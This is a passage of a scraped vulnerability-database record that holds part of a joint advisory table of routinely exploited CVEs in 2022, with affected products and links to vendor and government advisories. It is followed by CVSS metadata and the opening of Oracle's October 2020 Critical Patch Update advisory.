\"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) | Microsoft | Exchange Server, Multiple Versions | [Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) | \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a>) \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858> \"CVE-2021-26858\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065> \"CVE-2021-27065\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n \n[CVE-2021-20021](<https://nvd.nist.gov/vuln/detail/CVE-2021-20021> \"CVE-2021-20021\" )\n\n| \n\nSonicWALL\n\n| \n\nEmail Security version 10.0.9.x Email Security\n\n| \n\n[SonicWall Email Security pre-authentication administrative account creation vulnerability](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0007> \"SONICWALL EMAIL SECURITY PRE-AUTHENTICATION ADMINISTRATIVE ACCOUNT CREATION VULNERABILITY\" )\n\n| \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207> \"CVE-2021-31207\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207> \"Microsoft Exchange Server Security Feature Bypass Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities](<https://www.cisa.gov/news-events/alerts/2021/08/21/urgent-protect-against-active-exploitation-proxyshell-vulnerabilities> \"Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities\" )\n\nACSC Alert:\n\n[Microsoft Exchange ProxyShell Targeting in Australia](<https://www.cyber.gov.au/about-us/alerts/microsoft-exchange-proxyshell-targeting-australia> \"Microsoft Exchange ProxyShell Targeting in Australia\" ) \n \n[CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" )\n\n| \n\nAtlassian\n\n| \n\nConfluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1\n\n| \n\n[Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html> \"Confluence Security Advisory 2022-06-02\" )\n\n| \n\nCISA Alert:\n\n[CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog](<https://www.cisa.gov/news-events/alerts/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog> \"CISA Adds One Known Exploited Vulnerability \$CVE-2022-26134\$ to Catalog\u202f\u202f\" )\n\nACSC Alert:\n\n[Remote code execution vulnerability present in Atlassian Confluence Server and Data Center](<https://www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence> \"Remote code execution vulnerability present in Atlassian Confluence Server and Data Center\" ) \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473> \"CVE-2021-34473\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Version\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nJoint CSA:\n\n[Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a> \"Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities\" ) \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523> \"CVE-2021-34523\" )\n\n| \n\nMicrosoft\n\n| \n\nMicrosoft Exchange Server 2013 Cumulative Update 23\n\nMicrosoft Exchange Server 2016 Cumulative Updates 19 and 20\n\nMicrosoft Exchange Server 2019 Cumulative Updates 8 and 9\n\n| \n\n[Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523> \"Microsoft Exchange Server Elevation of Privilege Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities](<https://www.cisa.gov/news-events/alerts/2021/08/21/urgent-protect-against-active-exploitation-proxyshell-vulnerabilities> \"Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities\" ) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )\n\n| \n\nJira Atlassian\n\n| \n\nConfluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n| \n\n[Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940> \"Confluence Server Webwork OGNL injection - CVE-2021-26084\" )\n\n| \n\nCISA Alert:\n\n[Atlassian Releases Security Updates for Confluence Server and Data Center](<https://www.cisa.gov/news-events/alerts/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data-center> \"Atlassian Releases Security Updates for Confluence Server and Data Center\" ) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539> \"CVE-2021-40539\" )\n\n| \n\nZoho ManageEngineCorp.\n\n| \n\nManageEngine ADSelfService Plus builds up to 6113\n\n| \n\n[Security advisory - ADSelfService Plus authentication bypass vulnerability](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html> \"Security advisory - ADSelfService Plus authentication bypass vulnerability\" )\n\n| \n\nACSC Alert:\n\n[Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors](<https://www.cyber.gov.au/about-us/alerts/critical-vulnerability-manageengine-adselfservice-plus-exploited-cyber-actors> \"Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors\" ) \n \n[CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438> \"CVE-2021-40438\" )\n\n| \n\nApache\n\n| \n\nHTTP Server 2.4.48\n\n| | \n \n[CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \"CVE-2021-41773\" )\n\n| \n\nApache\n\n| \n\nApache HTTP Server 2.4.49\n\n| \n\n[Apache HTTP Server 2.4 vulnerabilities](<https://httpd.apache.org/security/vulnerabilities_24.html> \"Apache HTTP Server 2.4 vulnerabilities\" )\n\n| \n \n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013> \"CVE-2021-42013\" )\n\n| \n\nApache\n\n| \n\nApache HTTP Server 2.4.50\n\n| \n\n[Apache HTTP Server 2.4 vulnerabilities](<https://httpd.apache.org/security/vulnerabilities_24.html> \"Apache HTTP Server 2.4 vulnerabilities\" )\n\n| \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038> \"CVE-2021-20038\" )\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24svSMA 100 series appliances\n\n| \n\n[SonicWall patches multiple SMA100 affected vulnerabilities](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026> \"SONICWALL PATCHES MULTIPLE SMA100 AFFECTED VULNERABILITIES\" )\n\n| \n\nACSC Alert:\n\n[Remote code execution vulnerability present in SonicWall SMA 100 series appliances](<https://www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances>)\n\n_CCCS Alert:_\n\n[SonicWall Security Advisory](<https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4> \"SonicWall security advisory\" ) \n \n[CVE-2021- 44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228> \"CVE-2021-44228\" )\n\n| \n\nApache\n\n| \n\nLog4j, all versions from 2.0-beta9 to 2.14.1\n\n[For other affected vendors and products, see CISA's GitHub repository.](<https://github.com/cisagov/log4j-affected-db>)\n\n| \n\n[Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html> \"Apache Log4j Security Vulnerabilities\" )\n\nFor additional information, see joint CSA: [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a> \"Mitigating Log4Shell and Other Log4j-Related Vulnerabilities\" )\n\n| \n\nCISA webpage:\n\n[Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance> \"Apache Log4j Vulnerability Guidance\" )\n\n_CCCS Alert:_\n\n[Active exploitation of Apache Log4j vulnerability - Update 7](<https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability> \"Alert - Active exploitation of Apache Log4j vulnerability - update 7\" )\n\nACSC Advisory:\n\n[2021-007: Log4j vulnerability \u2013 advice and mitigations](<https://www.cyber.gov.au/about-us/advisories/2021-007-log4j-vulnerability-advice-and-mitigations> \"2021-007: Log4j vulnerability \u2013 advice and mitigations\" )\n\nACSC Publication:\n\n[Log4j: What Boards and Directors Need to Know](<https://www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/log4j-what-boards-and-directors-need-know> \"Log4j: What Boards and Directors Need to Know\" ) \n \n[CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046> \"CVE-2021-45046\" )\n\n| \n\nApache\n\n| \n\nLog4j 2.15.0Log4j\n\n| \n\n[Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html> \"Apache Log4j Security Vulnerabilities\" )\n\n| \n \n[CVE-2022-42475](<https://nvd.nist.gov/vuln/detail/CVE-2022-42475> \"CVE-2022-42475\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and\n\nFortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier\n\n| \n\n[FortiOS - heap-based buffer overflow in sslvpnd](<https://www.fortiguard.com/psirt/FG-IR-22-398> \"FortiOS - heap-based buffer overflow in sslvpnd\" )\n\n| \n \n[CVE-2022-24682](<https://nvd.nist.gov/vuln/detail/CVE-2022-24682> \"CVE-2022-24682\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1) Collaboration Suite\n\n| \n\n[Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P30> \"Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release\" )\n\n| \n \n[CVE-2022-22536 ](<https://nvd.nist.gov/vuln/detail/CVE-2022-22536> \"CVE-2022-22536\" )\n\n| \n\nSAP\n\n| \n\nNetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM)\n\n| \n\n[Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher](<https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/> \"Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher\" )\n\n| \n\nCISA Alert:\n\n[Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM)](<https://www.cisa.gov/news-events/alerts/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing> \"Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager \$ICM\$\" ) \n \n[CVE-2022-22963](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963> \"CVE-2022-22963\" )\n\n| \n\nVMware Tanzumware Tanzu\n\n| \n\nSpring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions\n\n| \n\n[CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression](<https://spring.io/security/cve-2022-22963> \"CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression\" )\n\n| \n \n[CVE-2022-22954](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954> \"CVE-2022-22954\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n\nIdentity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3\n\nvRealize Automation (vIDM), 8.x, 7.6\n\nVMware Cloud Foundation (vIDM), 4.x\n\nvRealize Suite Lifecycle Manager (vIDM), 8.xWorkspace\n\nONE Access and Identity Manager\n\n| \n\n[VMware Advisory VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html> \"VMSA-2022-0011\" )\n\n| \n \n[CVE-2022-22960](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960> \"CVE-2022-22960\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n\nIdentity Manager (vIDM) and vRealize Automation3.3.6, 3.3.5, 3.3.4, 3.3.3\n\nvRealize Automation (vIDM), 8.x, 7.6\n\nVMware Cloud Foundation (vIDM), 4.x\n\nVMware Cloud Foundation (vRA), 3.x\n\nvRealize Suite Lifecycle Manager (vIDM), 8.x\n\n| \n\n[VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html> \"VMSA-2022-0011\" )\n\n| \n \n[CVE-2022-29464](<https://nvd.nist.gov/vuln/detail/CVE-2022-29464> \"CVE-2022-29464\" )\n\n| \n\nAtlassianWSO2\n\n| \n\nWSO2 API Manager 2.2.0 and above through 4.0.0\n\nWSO2 Identity Server 5.2.0 and above through 5.11.0 \n\nWSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0\n\nWSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0\n\nWSO2 Enterprise Integrator 6.2.0 and above through 6.6.0\n\n| \n\n[WSO2 Documentation - Spaces](<https://wso2docs.atlassian.net/wiki/spaces> \"Spaces\" )\n\n| \n \n[CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924> \"CVE-2022-27924\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite, 8.8.15 and 9.0\n\n| \n\n[Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24.1#Security_Fixes> \"Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release\" )\n\n| \n \n[CVE-2022-1388](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388> \"CVE-2022-1388\" )\n\n| \n\nF5 Networks\n\n| \n\nF5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and All 12.1.x and 11.6.x versions\n\n| \n\n[K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388](<https://my.f5.com/manage/s/article/K23605346> \"K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388\" )\n\n| \n\nJoint CSA:\n\n[Threat Actors Exploiting F5 BIG-IP CVE-2022-1388](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138a> \"Threat Actors Exploiting F5 BIG-IP CVE-2022-1388\" ) \n \n[CVE-2022-30190](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190> \"CVE-2022-30190\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| | \n\nCISA Alert:\n\n[Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability](<https://www.cisa.gov/news-events/alerts/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability> \"Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability\" ) \n \n[CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047> \"CVE-2022-22047\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability, CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047> \"Windows Client Server Run-time Subsystem \$CSRSS\$ Elevation of Privilege Vulnerability\" )\n\n| \n \n[CVE-2022-27593](<https://nvd.nist.gov/vuln/detail/CVE-2022-27593> \"CVE-2022-27593\" )\n\n| \n\nQNAP\n\n| \n\nCertain QNAP NAS running Photo Station with internet exposure Ausustor Network Attached Storage\n\n| \n\n[DeadBolt Ransomware](<https://www.qnap.com/en/security-advisory/qsa-22-24> \"DeadBolt Ransomware\" )\n\n| \n \n[CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082> \"CVE-2022-41082\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nACSC Alert:\n\n[Vulnerability Alert \u2013 2 new Vulnerabilities associated with Microsoft Exchange.](<https://www.cyber.gov.au/about-us/alerts/vulnerability-alert-2-new-vulnerabilities-associated-microsoft-exchange> \"Vulnerability Alert \u2013 2 new Vulnerabilities associated with Microsoft Exchange.\" ) \n \n[CVE-2022-40684](<https://nvd.nist.gov/vuln/detail/CVE-2022-40684> \"CVE-2022-40684\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0\n\n| \n\n[FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface](<https://www.fortiguard.com/psirt/FG-IR-22-377> \"FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface\" )\n\n| \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-03T12:00:00", "type": "ics", "title": "2022 Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-13379", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-5902", "CVE-2021-20016", "CVE-2021-20021", "CVE-2021-20038", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40438", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-44228", "CVE-2021-45046", "CVE-2022-1388", "CVE-2022-22047", "CVE-2022-22536", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22963", "CVE-2022-24682", "CVE-2022-26134", "CVE-2022-27593", "CVE-2022-27924", "CVE-2022-29464", "CVE-2022-30190", "CVE-2022-40684", "CVE-2022-41082", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2023-08-03T12:00:00", "id": "AA23-215A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2023-09-30T02:41:47", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n \nStarting with the October 2020 Critical Patch Update, Oracle lists updates that address vulnerabilities in third-party components which are not exploitable in the context of their inclusion in their respective Oracle product beneath the product's risk matrix. Oracle has published two versions of the October 2020 Critical Patch Update Advisory: this version of the advisory implemented the change in how non-exploitable vulnerabilities in third-party components are reported, and the \u201ctraditional\u201d advisory follows the same format as the previous advisories. The \u201ctraditional\u201d advisory is published at <https://www.oracle.com/security-alerts/cpuoct2020traditional.html>. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 403 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2712240.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-20T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7285", "CVE-2015-1832", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-1000338", "CVE-2016-1000339", "CVE-2016-1000340", "CVE-2016-1000341", "CVE-2016-1000342", "CVE-2016-1000343", "CVE-2016-1000344", "CVE-2016-1000345", "CVE-2016-1000346", "CVE-2016-1000352", "CVE-2016-10244", "CVE-2016-10328", "CVE-2016-2167", "CVE-2016-2168", "CVE-2016-2183", "CVE-2016-2510", "CVE-2016-3189", "CVE-2016-4800", "CVE-2016-5000", "CVE-2016-5300", "CVE-2016-5725", "CVE-2016-6153", "CVE-2016-6306", "CVE-2016-8610", "CVE-2016-8734", "CVE-2017-10989", "CVE-2017-12626", "CVE-2017-13098", "CVE-2017-13685", "CVE-2017-13745", "CVE-2017-14232", "CVE-2017-15095", "CVE-2017-15286", "CVE-2017-17485", "CVE-2017-3164", "CVE-2017-5644", "CVE-2017-5645", "CVE-2017-5662", "CVE-2017-7525", "CVE-2017-7656", "CVE-2017-7657", "CVE-2017-7658", "CVE-2017-7857", "CVE-2017-7858", "CVE-2017-7864", "CVE-2017-8105", "CVE-2017-8287", "CVE-2017-9096", "CVE-2017-9735", "CVE-2017-9800", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000873", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-12536", "CVE-2018-12538", "CVE-2018-12545", "CVE-2018-14718", "CVE-2018-15769", "CVE-2018-17196", "CVE-2018-18873", "CVE-2018-19139", "CVE-2018-19539", "CVE-2018-19540", "CVE-2018-19541", "CVE-2018-19542", "CVE-2018-19543", "CVE-2018-20346", "CVE-2018-20505", "CVE-2018-20506", "CVE-2018-20570", "CVE-2018-20584", "CVE-2018-20622", "CVE-2018-20843", "CVE-2018-2765", "CVE-2018-3693", "CVE-2018-5382", "CVE-2018-5968", "CVE-2018-6942", "CVE-2018-7489", "CVE-2018-8013", "CVE-2018-8088", "CVE-2018-8740", "CVE-2018-9055", "CVE-2018-9154", "CVE-2018-9252", "CVE-2019-0192", "CVE-2019-0201", "CVE-2019-10072", "CVE-2019-10097", "CVE-2019-1010239", "CVE-2019-10173", "CVE-2019-10241", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-10744", "CVE-2019-11048", "CVE-2019-11358", "CVE-2019-11477", "CVE-2019-11478", "CVE-2019-11479", "CVE-2019-11834", "CVE-2019-11835", "CVE-2019-11922", "CVE-2019-12086", "CVE-2019-12260", "CVE-2019-12261", "CVE-2019-12384", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-12419", "CVE-2019-12423", "CVE-2019-12814", "CVE-2019-12900", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14540", "CVE-2019-14893", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-1563", "CVE-2019-15903", "CVE-2019-16168", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17267", "CVE-2019-17359", "CVE-2019-17495", "CVE-2019-17531", "CVE-2019-17543", "CVE-2019-17558", "CVE-2019-17569", "CVE-2019-17632", "CVE-2019-17638", "CVE-2019-18348", "CVE-2019-20330", "CVE-2019-2897", "CVE-2019-2904", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-5018", "CVE-2019-5427", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-8457", "CVE-2019-9511", "CVE-2019-9513", "CVE-2019-9936", "CVE-2019-9937", "CVE-2020-10108", "CVE-2020-10543", "CVE-2020-10650", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10722", "CVE-2020-10723", "CVE-2020-10724", "CVE-2020-10878", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11619", "CVE-2020-11620", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-11971", "CVE-2020-11972", "CVE-2020-11973", "CVE-2020-11984", "CVE-2020-11993", "CVE-2020-11996", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13630", "CVE-2020-13631", "CVE-2020-13632", "CVE-2020-13920", "CVE-2020-13934", "CVE-2020-13935", "CVE-2020-14060", "CVE-2020-14061", "CVE-2020-14062", "CVE-2020-14195", "CVE-2020-14672", "CVE-2020-14731", "CVE-2020-14732", "CVE-2020-14734", "CVE-2020-14735", "CVE-2020-14736", "CVE-2020-14740", "CVE-2020-14741", "CVE-2020-14742", "CVE-2020-14743", "CVE-2020-14744", "CVE-2020-14745", "CVE-2020-14746", "CVE-2020-14752", "CVE-2020-14753", "CVE-2020-14754", "CVE-2020-14757", "CVE-2020-14758", "CVE-2020-14759", "CVE-2020-14760", "CVE-2020-14761", "CVE-2020-14762", 